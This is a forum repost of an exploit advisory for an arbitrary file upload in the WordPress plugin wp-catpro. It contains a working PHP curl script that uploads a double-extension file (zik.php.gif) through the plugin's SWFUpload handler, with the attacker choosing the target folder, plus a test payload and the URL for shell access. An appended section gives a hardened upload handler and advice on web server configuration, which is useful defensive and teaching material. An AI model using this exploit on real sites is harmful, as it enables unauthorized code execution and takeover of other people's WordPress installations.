China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: WordPress plugin wp-catpro arbitrary file upload

Author: admin    Posted: 2013-2-27 20:12
Title: WordPress plugin wp-catpro arbitrary file upload
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

Author  => Zikou-16
Email   => zikou16x@gmail.com
Tested on : Windows 7, Backtrack 5r3
Download : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit info:
------------------
# An attacker can upload file/shell.php.gif: the name ends in .gif, so it passes the
# extension whitelist below, while the web server still executes the file as PHP.
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php

// Local payload: PHP code saved under a .gif extension so that it passes the extension check.
$uploadfile = "zik.php.gif";

// The vulnerable handler is the SWFUpload upload.php shipped inside the plugin.
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => new CURLFile($uploadfile),   // original used "@$uploadfile"; CURLFile is required on PHP 5.5+
          'folder'   => '/wp-content/uploads/catpro/'));  // destination folder is taken from the request
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

// Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>

Contents of zik.php.gif (the uploaded payload):
<?php
phpinfo();
?>
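For comparison, the following is a hardened upload handler added here as an example; it is not code from wp-catpro or SWFUpload. It assumes PHP 7 or later and a fixed server-side directory ($upload_dir, an assumed path). It closes the three openings the exploit above relies on: a name such as zik.php.gif is rejected because only one extension, taken from a whitelist, is permitted; the file bytes are checked to be an image rather than trusting the name; and both the destination folder and the final file name are chosen on the server, so the request's 'folder' field is ignored.

```php
<?php
// Added example: hardened image upload handler (not the plugin's own upload.php).
// Assumption: $upload_dir is a fixed path outside the attacker's control.
$upload_dir = '/var/www/html/wp-content/uploads/catpro/';

// Whitelist: extension => MIME type that the file content must actually have.
$allowed = array('jpg' => 'image/jpeg', 'gif' => 'image/gif', 'png' => 'image/png');

function reject($msg) {
    http_response_code(400);
    echo $msg;
    exit;
}

if (!isset($_FILES['Filedata']) || $_FILES['Filedata']['error'] !== UPLOAD_ERR_OK) {
    reject('no file');
}

$tmp  = $_FILES['Filedata']['tmp_name'];
$name = $_FILES['Filedata']['name'];

// 1. Exactly one dot, so exactly one extension. "zik.php.gif" has two and fails here,
//    which also defeats web servers that evaluate every extension in the name.
if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$/', $name, $m)) {
    reject('bad filename');
}
$ext = strtolower($m[1]);
if (!isset($allowed[$ext])) {
    reject('extension not allowed');
}

// 2. Check the bytes, not the name: finfo reads the magic bytes of the temporary file,
//    and getimagesize() must also be able to parse it as an image.
$finfo = new finfo(FILEINFO_MIME_TYPE);
if ($finfo->file($tmp) !== $allowed[$ext]) {
    reject('content does not match extension');
}
if (@getimagesize($tmp) === false) {
    reject('not an image');
}

// 3. Never reuse the client-supplied name or folder: generate a random name and append
//    only the whitelisted extension. Any 'folder' field in the request is simply ignored.
$new_name = bin2hex(random_bytes(16)) . '.' . $ext;
if (!move_uploaded_file($tmp, $upload_dir . $new_name)) {
    reject('save failed');
}
echo $new_name;
```

The single-extension rule matters because of how the shell access in the exploit works: a file named random_name.php.gif is still run as PHP by a web server that maps the .php suffix to the PHP handler regardless of what follows it (Apache's mod_mime behaves this way with AddHandler/AddType). Independently of the handler code, script execution should also be disabled for the uploads directory in the web server configuration, so that even a valid image carrying PHP in its comment section cannot be executed.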




Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2